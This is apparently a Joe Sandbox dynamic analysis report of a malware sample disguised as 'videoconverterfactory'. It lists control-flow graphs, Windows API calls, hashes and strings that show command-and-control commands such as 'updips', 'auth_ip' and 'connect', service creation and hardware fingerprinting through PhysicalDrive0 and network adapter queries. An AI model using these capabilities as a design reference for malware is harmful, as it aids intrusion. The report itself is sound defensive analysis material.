                                                                                                      • Opcode ID: 61650bf159b33983e421a10d7c94c4fe94b47da5186889e4902744464d0d9d2f
                                                                                                      • Instruction ID: 464e5b7639f8cd6b097f9b9d0631fabd65090baee24a13c7850f511ccfdb1cbc
                                                                                                      • Opcode Fuzzy Hash: 61650bf159b33983e421a10d7c94c4fe94b47da5186889e4902744464d0d9d2f
                                                                                                      • Instruction Fuzzy Hash: ED71BDB5D48350ABD711AF78A809B5BBBE8EF55304F10091DF68897381DBF49C548BA2

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 936 2d2e9ac-2d2e9cf LoadLibraryA 937 2d2e9d5-2d2e9e3 GetProcAddress 936->937 938 2d2ea8f-2d2ea96 936->938 939 2d2ea88-2d2ea89 FreeLibrary 937->939 940 2d2e9e9-2d2e9f9 937->940 939->938 941 2d2e9fb-2d2ea07 GetAdaptersInfo 940->941 942 2d2ea09 941->942 943 2d2ea3f-2d2ea47 941->943 944 2d2ea0b-2d2ea12 942->944 945 2d2ea50-2d2ea55 943->945 946 2d2ea49-2d2ea4f call 2d326df 943->946 949 2d2ea14-2d2ea18 944->949 950 2d2ea1c-2d2ea24 944->950 947 2d2ea83-2d2ea87 945->947 948 2d2ea57-2d2ea5a 945->948 946->945 947->939 948->947 952 2d2ea5c-2d2ea61 948->952 949->944 953 2d2ea1a 949->953 954 2d2ea27-2d2ea2c 950->954 956 2d2ea63-2d2ea6b 952->956 957 2d2ea6e-2d2ea79 call 2d327c5 952->957 953->943 954->954 958 2d2ea2e-2d2ea3b call 2d2e6fb 954->958 956->957 957->947 963 2d2ea7b-2d2ea7e 957->963 958->943 963->941
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 02D2E9C2
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02D2E9DB
                                                                                                      • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02D2EA00
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 02D2EA89
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                      • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                                      • API String ID: 514930453-3114217049
                                                                                                      • Opcode ID: d8b77c78774f95a046b7d1223febc08a6810f6949f75067e169fc17e7c0a01f5
                                                                                                      • Instruction ID: 65440631f31ae55ddb7d17867015aed96d5607c437bd91414ed52154d5c7e1ac
                                                                                                      • Opcode Fuzzy Hash: d8b77c78774f95a046b7d1223febc08a6810f6949f75067e169fc17e7c0a01f5
                                                                                                      • Instruction Fuzzy Hash: FF21D575E082699BDB10DFA8D8847EEBBF8BF15308F1400A9E544E7301DB30AD49CBA4

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 964 2d22b95-2d22baf 965 2d22bb1-2d22bb9 call 2d2fb20 964->965 966 2d22bc7-2d22bcb 964->966 975 2d22bbf-2d22bc2 965->975 967 2d22bdf 966->967 968 2d22bcd-2d22bd0 966->968 971 2d22be2-2d22c11 WSASetLastError WSARecv call 2d2950e 967->971 968->967 970 2d22bd2-2d22bdd call 2d2fb20 968->970 970->975 978 2d22c16-2d22c1d 971->978 976 2d22d30 975->976 979 2d22d32-2d22d38 976->979 980 2d22c1f-2d22c2a call 2d2fb20 978->980 981 2d22c2c-2d22c32 978->981 991 2d22c3f-2d22c42 980->991 983 2d22c46-2d22c48 981->983 984 2d22c34-2d22c39 call 2d2fb20 981->984 985 2d22c4a-2d22c4d 983->985 986 2d22c4f-2d22c60 call 2d2fb20 983->986 984->991 989 2d22c66-2d22c69 985->989 986->979 986->989 994 2d22c73-2d22c76 989->994 995 2d22c6b-2d22c6d 989->995 991->983 994->976 997 2d22c7c-2d22c9a call 2d2fb20 call 2d2166f 994->997 995->994 996 2d22d22-2d22d2d call 2d21996 995->996 996->976 1004 2d22cbc-2d22cfa WSASetLastError select call 2d2950e 997->1004 1005 2d22c9c-2d22cba call 2d2fb20 call 2d2166f 997->1005 1011 2d22d08 1004->1011 1012 2d22cfc-2d22d06 call 2d2fb20 1004->1012 1005->976 1005->1004 1015 2d22d15-2d22d17 1011->1015 1016 2d22d0a-2d22d12 call 2d2fb20 1011->1016 1019 2d22d19-2d22d1d 1012->1019 1015->976 1015->1019 1016->1015 1019->971
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02D22BE4
                                                                                                      • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02D22C07
                                                                                                        • Part of subcall function 02D2950E: WSAGetLastError.WS2_32(00000000,?,?,02D22A51), ref: 02D2951C
                                                                                                      • WSASetLastError.WS2_32 ref: 02D22CD3
                                                                                                      • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02D22CE7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$Recvselect
                                                                                                      • String ID: 3'
                                                                                                      • API String ID: 886190287-280543908
                                                                                                      • Opcode ID: aabe8059247f0339ca3c32ec361d1cd4ae8d01b6090ce5f827327ffb13594332
                                                                                                      • Instruction ID: 312d3cafebe8cd5becaa1569391d317265b9857af51bac11dc378fd38d3b97aa
                                                                                                      • Opcode Fuzzy Hash: aabe8059247f0339ca3c32ec361d1cd4ae8d01b6090ce5f827327ffb13594332
                                                                                                      • Instruction Fuzzy Hash: 93414BB19083118FD7109F64C4187ABBBE9EFA4758F10491EB89587784EB74DD48CBA1

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1021 2d2e8a8-2d2e8d3 CreateFileA 1022 2d2e9a4-2d2e9ab 1021->1022 1023 2d2e8d9-2d2e8ee 1021->1023 1024 2d2e8f1-2d2e913 DeviceIoControl 1023->1024 1025 2d2e915-2d2e91d 1024->1025 1026 2d2e94c-2d2e954 1024->1026 1027 2d2e926-2d2e92b 1025->1027 1028 2d2e91f-2d2e924 1025->1028 1029 2d2e956-2d2e95c call 2d326df 1026->1029 1030 2d2e95d-2d2e95f 1026->1030 1027->1026 1031 2d2e92d-2d2e935 1027->1031 1028->1026 1029->1030 1033 2d2e961-2d2e964 1030->1033 1034 2d2e99a-2d2e9a3 CloseHandle 1030->1034 1037 2d2e938-2d2e93d 1031->1037 1035 2d2e980-2d2e98d call 2d327c5 1033->1035 1036 2d2e966-2d2e96f GetLastError 1033->1036 1034->1022 1035->1034 1045 2d2e98f-2d2e995 1035->1045 1036->1034 1039 2d2e971-2d2e974 1036->1039 1037->1037 1041 2d2e93f-2d2e94b call 2d2e6fb 1037->1041 1039->1035 1042 2d2e976-2d2e97d 1039->1042 1041->1026 1042->1035 1045->1024
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02D2E8C7
                                                                                                      • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02D2E905
                                                                                                      • GetLastError.KERNEL32 ref: 02D2E966
                                                                                                      • CloseHandle.KERNELBASE(?), ref: 02D2E99D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                                      • String ID: \\.\PhysicalDrive0
                                                                                                      • API String ID: 4026078076-1180397377
                                                                                                      • Opcode ID: a4d6996506623cf9b606c8b4c4e80efbe0ca3c45c07d7a34d8f6b585772af10b
                                                                                                      • Instruction ID: aedeaa29a18e79e3709310f9e4d0b2116ca57d78d8514b36b6d843914ffc5d15
                                                                                                      • Opcode Fuzzy Hash: a4d6996506623cf9b606c8b4c4e80efbe0ca3c45c07d7a34d8f6b585772af10b
                                                                                                      • Instruction Fuzzy Hash: C2318275D00225EBDB24CF94D884BEEBBB8EF55758F20416AE505B7380D7B06E08CBA0
                                                                                                      APIs
                                                                                                      • CloseServiceHandle.SECHOST(00000000,?,?,?,000F01FF,00000010,00000002,00000001), ref: 0040D25D
                                                                                                      • CloseServiceHandle.ADVAPI32(?,?,?,?,000F01FF,00000010,00000002,00000001), ref: 0040D785
                                                                                                      • CreateServiceA.ADVAPI32(?,?,?,000F01FF,00000010,00000002,00000001), ref: 0040D812
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Service$CloseHandle$Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2095555506-0
                                                                                                      • Opcode ID: 67bc7c562a5f946bb062d4525a1ca536a8acf2dcbb2153a5e03ac2972f3ecf44
                                                                                                      • Instruction ID: 7cc6726410280f31de59b83ab0219a71bc523d850eae9e70992ee5b829060949
                                                                                                      • Opcode Fuzzy Hash: 67bc7c562a5f946bb062d4525a1ca536a8acf2dcbb2153a5e03ac2972f3ecf44
                                                                                                      • Instruction Fuzzy Hash: CAE04F30E88205F6DA242BC05D49F6A2D24A785B50F304837F617790D0DABE598EB52F

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 244 2d26206-2d26218 245 2d26261-2d26264 244->245 246 2d2621a-2d26260 244->246 247 2d26266-2d2626c 245->247 248 2d2628b-2d26338 245->248 246->245 252 2d26371 248->252 253 2d2633a-2d2634f 248->253 256 2d263a3 252->256 257 2d26373-2d2638a 252->257 254 2d263c3-2d263ef 253->254 255 2d26351-2d2635c 253->255 261 2d263f1-2d263f7 254->261 262 2d263ff-2d26449 254->262 260 2d263a4-2d263af 255->260 263 2d2635e-2d26360 255->263 256->260 258 2d263b3-2d263c2 257->258 259 2d2638c-2d26397 257->259 258->254 259->256 264 2d263b1-2d263b2 260->264 265 2d263fd-2d263fe 260->265 266 2d26470-2d26499 call 2d33760 call 2d2439c 261->266 267 2d263f9-2d263fb 261->267 268 2d26465-2d2646f 262->268 269 2d2644b-2d26451 262->269 264->258 265->262 270 2d260f1-2d260f3 266->270 285 2d2649f-2d264ca RtlEnterCriticalSection RtlLeaveCriticalSection call 2d3134c 266->285 267->265 268->266 268->270 272 2d26453-2d26455 269->272 273 2d26457-2d26464 call 2d2534d 269->273 276 2d260f5-2d260fa 270->276 277 2d260fc-2d260fe 270->277 272->268 273->268 283 2d26105 Sleep 276->283 279 2d26100 277->279 280 2d2610b-2d2613a RtlEnterCriticalSection RtlLeaveCriticalSection 277->280 279->283 280->244 283->280 288 2d26514-2d2652c call 2d3134c 285->288 289 2d264cc-2d264db call 2d3134c 285->289 294 2d26532-2d26534 288->294 295 2d267d3-2d267e2 call 2d3134c 288->295 289->288 296 2d264dd-2d264ec call 2d3134c 289->296 294->295 298 2d2653a-2d265e5 call 2d31fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2d33760 * 5 call 2d2439c * 2 294->298 303 2d26827-2d26836 call 2d3134c 295->303 304 2d267e4-2d267e6 295->304 296->288 306 2d264ee-2d264fd call 2d3134c 296->306 350 2d26622 298->350 351 2d265e7-2d265e9 298->351 315 2d2684b-2d2685a call 2d3134c 303->315 316 2d26838-2d26846 call 2d25c12 call 2d25d20 303->316 304->303 307 2d267e8-2d26822 call 2d33760 RtlEnterCriticalSection RtlLeaveCriticalSection 304->307 306->288 317 2d264ff-2d2650e call 2d3134c 306->317 307->270 315->270 330 2d26860-2d26862 315->330 316->270 317->270 317->288 330->270 333 2d26868-2d26881 call 2d2439c 330->333 333->270 339 2d26887-2d26956 call 2d31428 call 2d21ba7 333->339 348 2d26958 call 2d2143f 339->348 349 2d2695d-2d2697e RtlEnterCriticalSection 339->349 348->349 354 2d26980-2d26987 349->354 355 2d2698a-2d269f1 RtlLeaveCriticalSection call 2d23c67 call 2d23d7e call 2d27340 349->355 352 2d26626-2d26654 call 2d31fbc call 2d33760 call 2d2439c 350->352 351->350 356 2d265eb-2d265fd call 2d3134c 351->356 374 2d26656-2d26665 call 2d325f6 352->374 375 2d26695-2d2669e call 2d31f84 352->375 354->355 376 2d269f7-2d26a39 call 2d2972a 355->376 377 2d26b59-2d26b6d call 2d28008 355->377 356->350 365 2d265ff-2d26620 call 2d2439c 356->365 365->352 374->375 388 2d26667 374->388 386 2d267c1-2d267ce 375->386 387 2d266a4-2d266bc call 2d327c5 375->387 389 2d26b23-2d26b54 call 2d273ef call 2d233b2 376->389 390 2d26a3f-2d26a46 376->390 377->270 386->270 400 2d266c8 387->400 401 2d266be-2d266c6 call 2d2873c 387->401 393 2d2666c-2d2667e call 2d31860 388->393 389->377 391 2d26a49-2d26a4e 390->391 391->391 395 2d26a50-2d26a95 call 2d2972a 391->395 407 2d26683-2d26693 call 2d325f6 393->407 408 2d26680 393->408 395->389 410 2d26a9b-2d26aa1 395->410 406 2d266ca-2d2676e call 2d29854 call 2d23863 call 2d25119 call 2d23863 call 2d29afa call 2d29c14 400->406 401->406 432 2d26770 call 2d2380b 406->432 433 2d26775-2d267a0 Sleep call 2d30900 406->433 407->375 407->393 408->407 414 2d26aa4-2d26aa9 410->414 414->414 417 2d26aab-2d26ae6 call 2d2972a 414->417 417->389 423 2d26ae8-2d26b22 call 2d2c11c 417->423 423->389 432->433 437 2d267a2-2d267ab call 2d24100 433->437 438 2d267ac-2d267ba 433->438 437->438 438->386 440 2d267bc call 2d2380b 438->440 440->386
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$rGI$updips$updurls
                                                                                                      • API String ID: 0-3116384143
                                                                                                      • Opcode ID: 64436f895e7c584d1f0ce73e5e8509842a43e73e5bf24b378f03ae4eea623b55
                                                                                                      • Instruction ID: 8e06db7b802ef43053b464045f091c1025f300e1b64672f9a7ecd88a5e53eab8
                                                                                                      • Opcode Fuzzy Hash: 64436f895e7c584d1f0ce73e5e8509842a43e73e5bf24b378f03ae4eea623b55
                                                                                                      • Instruction Fuzzy Hash: 9E3226715083919FD7259F24D840BABBBE9EFA6318F14081DE5C99B381DB70DC49CBA2

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 443 2d2639a-2d263a2 444 2d263a4-2d263af 443->444 445 2d263b1-2d263b2 444->445 446 2d263fd-2d263fe 444->446 447 2d263b3-2d263c2 445->447 448 2d263ff-2d26449 446->448 449 2d263c3-2d263ef 447->449 450 2d26465-2d2646f 448->450 451 2d2644b-2d26451 448->451 449->448 454 2d263f1-2d263f7 449->454 452 2d26470-2d26499 call 2d33760 call 2d2439c 450->452 453 2d260f1-2d260f3 450->453 455 2d26453-2d26455 451->455 456 2d26457-2d26464 call 2d2534d 451->456 452->453 475 2d2649f-2d264ca RtlEnterCriticalSection RtlLeaveCriticalSection call 2d3134c 452->475 460 2d260f5-2d260fa 453->460 461 2d260fc-2d260fe 453->461 454->452 458 2d263f9-2d263fb 454->458 455->450 456->450 458->446 467 2d26105 Sleep 460->467 463 2d26100 461->463 464 2d2610b-2d26218 RtlEnterCriticalSection RtlLeaveCriticalSection 461->464 463->467 470 2d26261-2d26264 464->470 471 2d2621a-2d26260 464->471 467->464 473 2d26266-2d2626c 470->473 474 2d2628b-2d26338 470->474 471->470 486 2d26371 474->486 487 2d2633a-2d2634f 474->487 479 2d26514-2d2652c call 2d3134c 475->479 480 2d264cc-2d264db call 2d3134c 475->480 489 2d26532-2d26534 479->489 490 2d267d3-2d267e2 call 2d3134c 479->490 480->479 492 2d264dd-2d264ec call 2d3134c 480->492 493 2d263a3 486->493 494 2d26373-2d2638a 486->494 487->449 491 2d26351-2d2635c 487->491 489->490 497 2d2653a-2d265e5 call 2d31fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2d33760 * 5 call 2d2439c * 2 489->497 503 2d26827-2d26836 call 2d3134c 490->503 504 2d267e4-2d267e6 490->504 491->444 498 2d2635e-2d26360 491->498 492->479 506 2d264ee-2d264fd call 2d3134c 492->506 493->444 494->447 495 2d2638c-2d26397 494->495 495->493 550 2d26622 497->550 551 2d265e7-2d265e9 497->551 515 2d2684b-2d2685a call 2d3134c 503->515 516 2d26838-2d26846 call 2d25c12 call 2d25d20 503->516 504->503 507 2d267e8-2d26822 call 2d33760 RtlEnterCriticalSection RtlLeaveCriticalSection 504->507 506->479 517 2d264ff-2d2650e call 2d3134c 506->517 507->453 515->453 530 2d26860-2d26862 515->530 516->453 517->453 517->479 530->453 533 2d26868-2d26881 call 2d2439c 530->533 533->453 539 2d26887-2d26956 call 2d31428 call 2d21ba7 533->539 548 2d26958 call 2d2143f 539->548 549 2d2695d-2d2697e RtlEnterCriticalSection 539->549 548->549 554 2d26980-2d26987 549->554 555 2d2698a-2d269f1 RtlLeaveCriticalSection call 2d23c67 call 2d23d7e call 2d27340 549->555 552 2d26626-2d26654 call 2d31fbc call 2d33760 call 2d2439c 550->552 551->550 556 2d265eb-2d265fd call 2d3134c 551->556 574 2d26656-2d26665 call 2d325f6 552->574 575 2d26695-2d2669e call 2d31f84 552->575 554->555 576 2d269f7-2d26a39 call 2d2972a 555->576 577 2d26b59-2d26b6d call 2d28008 555->577 556->550 565 2d265ff-2d26620 call 2d2439c 556->565 565->552 574->575 588 2d26667 574->588 586 2d267c1-2d267ce 575->586 587 2d266a4-2d266bc call 2d327c5 575->587 589 2d26b23-2d26b54 call 2d273ef call 2d233b2 576->589 590 2d26a3f-2d26a46 576->590 577->453 586->453 600 2d266c8 587->600 601 2d266be-2d266c6 call 2d2873c 587->601 593 2d2666c-2d2667e call 2d31860 588->593 589->577 591 2d26a49-2d26a4e 590->591 591->591 595 2d26a50-2d26a95 call 2d2972a 591->595 607 2d26683-2d26693 call 2d325f6 593->607 608 2d26680 593->608 595->589 610 2d26a9b-2d26aa1 595->610 606 2d266ca-2d2676e call 2d29854 call 2d23863 call 2d25119 call 2d23863 call 2d29afa call 2d29c14 600->606 601->606 632 2d26770 call 2d2380b 606->632 633 2d26775-2d267a0 Sleep call 2d30900 606->633 607->575 607->593 608->607 614 2d26aa4-2d26aa9 610->614 614->614 617 2d26aab-2d26ae6 call 2d2972a 614->617 617->589 623 2d26ae8-2d26b22 call 2d2c11c 617->623 623->589 632->633 637 2d267a2-2d267ab call 2d24100 633->637 638 2d267ac-2d267ba 633->638 637->638 638->586 640 2d267bc call 2d2380b 638->640 640->586
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _memset$CriticalSection$EnterLeave_malloc_strtok$_free_swscanf
                                                                                                      • String ID: <htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls
                                                                                                      • API String ID: 3441009308-1437582238
                                                                                                      • Opcode ID: 55f3e0307935c46c4ec1f2238cbf22fb63e4769cf9da768e29795ba82acd03f9
                                                                                                      • Instruction ID: 699dc09863e2038cd41476c78fb98dc06218c1c0de682892ee89e91f6a226fd5
                                                                                                      • Opcode Fuzzy Hash: 55f3e0307935c46c4ec1f2238cbf22fb63e4769cf9da768e29795ba82acd03f9
                                                                                                      • Instruction Fuzzy Hash: 33C179326483919BD712AB34E850B5B7BE9DFA671CF14041DF4859B381DF61DC09CBA2

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D21D11
                                                                                                      • GetLastError.KERNEL32 ref: 02D21D23
                                                                                                        • Part of subcall function 02D21712: __EH_prolog.LIBCMT ref: 02D21717
                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D21D59
                                                                                                      • GetLastError.KERNEL32 ref: 02D21D6B
                                                                                                      • __beginthreadex.LIBCMT ref: 02D21DB1
                                                                                                      • GetLastError.KERNEL32 ref: 02D21DC6
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02D21DDD
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02D21DEC
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D21E14
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02D21E1B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                                      • String ID: thread$thread.entry_event$thread.exit_event
                                                                                                      • API String ID: 831262434-3017686385
                                                                                                      • Opcode ID: 0e3398d39433298358e0c0c75f689a630251df623b435fc65e7bee01e28dc04b
                                                                                                      • Instruction ID: 1d7b70049d0fceda17bfeda51b3e7182d0a2fb8281d13f5e7f0bd1ade66916ae
                                                                                                      • Opcode Fuzzy Hash: 0e3398d39433298358e0c0c75f689a630251df623b435fc65e7bee01e28dc04b
                                                                                                      • Instruction Fuzzy Hash: 163157759043119FD710EF20D848B2BBBE5EBA4754F108969F8598B391DB70EC49CFA2

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 672 2d24603-2d2463b call 2d42a10 call 2d2fb20 call 2d327c5 679 2d24647 672->679 680 2d2463d-2d24645 call 2d2873c 672->680 682 2d24649-2d2465c call 2d29854 679->682 680->682 686 2d24661-2d24664 682->686 687 2d24683-2d24687 686->687 688 2d24666-2d24672 htons 686->688 691 2d246f1-2d247f8 call 2d21ba7 call 2d2cef8 htons call 2d31428 call 2d26d29 call 2d26d03 * 2 call 2d27991 call 2d274b6 687->691 692 2d24689-2d246db htonl * 2 htons call 2d23d7e call 2d27340 687->692 689 2d24678-2d24681 688->689 690 2d248ae-2d248c1 call 2d327c5 688->690 689->686 689->687 700 2d248c3-2d248cb call 2d2873c 690->700 701 2d248cd 690->701 744 2d24871-2d2487a 691->744 745 2d247fa-2d24805 691->745 704 2d246e0-2d246e4 692->704 705 2d248cf-2d24917 call 2d29854 call 2d23c67 call 2d23d7e call 2d27340 700->705 701->705 704->690 708 2d246ea-2d246ec 704->708 725 2d24b38-2d24b43 705->725 726 2d2491d-2d2494a call 2d2972a 705->726 708->690 729 2d24b45 call 2d2380b 725->729 730 2d24b4a-2d24b53 725->730 726->725 740 2d24950-2d2495a 726->740 729->730 734 2d24b55 call 2d2380b 730->734 735 2d24b5a-2d24b76 call 2d27991 730->735 734->735 741 2d24960-2d24977 call 2d273b6 740->741 742 2d24a07-2d24a09 740->742 757 2d24979-2d2499d htonl * 2 741->757 758 2d2499f-2d249b7 741->758 750 2d24a0a-2d24a33 call 2d2972a 742->750 747 2d24881-2d248a5 call 2d27991 * 2 744->747 748 2d2487c call 2d2143f 744->748 749 2d24809-2d24813 745->749 747->690 774 2d248a7-2d248a9 call 2d2143f 747->774 748->747 753 2d24815-2d24841 call 2d27340 749->753 754 2d2486e 749->754 750->725 765 2d24a39-2d24a5e call 2d2972a 750->765 767 2d24843-2d24863 call 2d272ba call 2d2750e 753->767 768 2d2486c 753->768 754->744 762 2d249ba-2d249e2 call 2d23bd3 htonl * 2 call 2d273b6 757->762 758->762 780 2d249e7-2d24a05 htons * 2 762->780 765->725 775 2d24a64-2d24a8d call 2d2972a 765->775 767->749 785 2d24865-2d2486a call 2d2143f 767->785 768->754 774->690 775->725 784 2d24a93-2d24b11 call 2d23863 * 2 call 2d298b1 call 2d29950 call 2d24bad call 2d23863 * 2 call 2d244ab 775->784 780->750 803 2d24b16-2d24b2d call 2d30900 784->803 785->749 803->725 806 2d24b2f-2d24b37 call 2d24100 803->806 806->725
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02D24608
                                                                                                        • Part of subcall function 02D327C5: _malloc.LIBCMT ref: 02D327DD
                                                                                                      • htons.WS2_32(?), ref: 02D24669
                                                                                                      • htonl.WS2_32(?), ref: 02D2468C
                                                                                                      • htonl.WS2_32(00000000), ref: 02D24693
                                                                                                      • htons.WS2_32(00000000), ref: 02D24747
                                                                                                      • _sprintf.LIBCMT ref: 02D2475D
                                                                                                        • Part of subcall function 02D27991: _memmove.LIBCMT ref: 02D279B1
                                                                                                      • htons.WS2_32(?), ref: 02D246B0
                                                                                                        • Part of subcall function 02D2873C: __EH_prolog.LIBCMT ref: 02D28741
                                                                                                        • Part of subcall function 02D2873C: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D287BC
                                                                                                        • Part of subcall function 02D2873C: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D287DA
                                                                                                        • Part of subcall function 02D21BA7: __EH_prolog.LIBCMT ref: 02D21BAC
                                                                                                        • Part of subcall function 02D21BA7: RtlEnterCriticalSection.NTDLL ref: 02D21BBC
                                                                                                        • Part of subcall function 02D21BA7: RtlLeaveCriticalSection.NTDLL ref: 02D21BEA
                                                                                                        • Part of subcall function 02D21BA7: RtlEnterCriticalSection.NTDLL ref: 02D21C13
                                                                                                        • Part of subcall function 02D21BA7: RtlLeaveCriticalSection.NTDLL ref: 02D21C56
                                                                                                        • Part of subcall function 02D2CEF8: __EH_prolog.LIBCMT ref: 02D2CEFD
                                                                                                      • htonl.WS2_32(?), ref: 02D2497C
                                                                                                      • htonl.WS2_32(00000000), ref: 02D24983
                                                                                                      • htonl.WS2_32(00000000), ref: 02D249C8
                                                                                                      • htonl.WS2_32(00000000), ref: 02D249CF
                                                                                                      • htons.WS2_32(?), ref: 02D249EF
                                                                                                      • htons.WS2_32(?), ref: 02D249F9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 1645262487-0
                                                                                                      • Opcode ID: f6a4c9a47b41df8d8ad50703171471094d170eae9585df642897456ea6c50293
                                                                                                      • Instruction ID: f7a827d7430b1143353d1c1470e73e764cc44d520f52bec0c195245b16788a3f
                                                                                                      • Opcode Fuzzy Hash: f6a4c9a47b41df8d8ad50703171471094d170eae9585df642897456ea6c50293
                                                                                                      • Instruction Fuzzy Hash: 53022771D00269EBEF15DBA4D854BEEBBB9EF28308F10415AE905B7280DB745E48CF61

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
